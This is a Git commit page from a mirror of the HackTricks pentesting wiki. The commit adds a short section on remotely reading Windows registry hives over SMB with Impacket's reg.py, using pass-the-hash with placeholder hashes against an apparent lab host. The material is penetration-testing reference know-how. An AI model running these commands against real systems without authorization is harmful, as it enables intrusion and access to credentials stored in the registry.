0x22bb/hacktricks
1
2
Fork 0
mirror of https://github.com/carlospolop/hacktricks.git synced 2023-12-14 19:12:55 +01:00
Code Releases Activity

GitBook: [master] one page modified

Browse source
This commit is contained in:
CPol 2020-12-22 15:40:31 +00:00 committed by gitbook-bot
parent 36482a062d
commit 3f03a136a3
No known key found for this signature in database
GPG key ID: 07D2180C7B12D0FF
1 changed files with 10 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

10
pentesting/pentesting-smb.md
View file

@ -276,6 +276,16 @@ Commands:
\(_Information from the manpage of smbclient_\)
### Read Registry
You may be able to **read the registry** using some discovered credentials. Impacket `reg.py` allows you to try:
```bash
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKCU -s
sudo reg.py domain.local/USERNAME@MACHINE.htb -hashes 1a3487d42adaa12332bdb34a876cb7e6:1a3487d42adaa12332bdb34a876cb7e6 query -keyName HKLM -s
```
## Authenticate using Kerberos
You can **authenticate** to **kerberos** using the tools **smbclient** and **rpcclient**: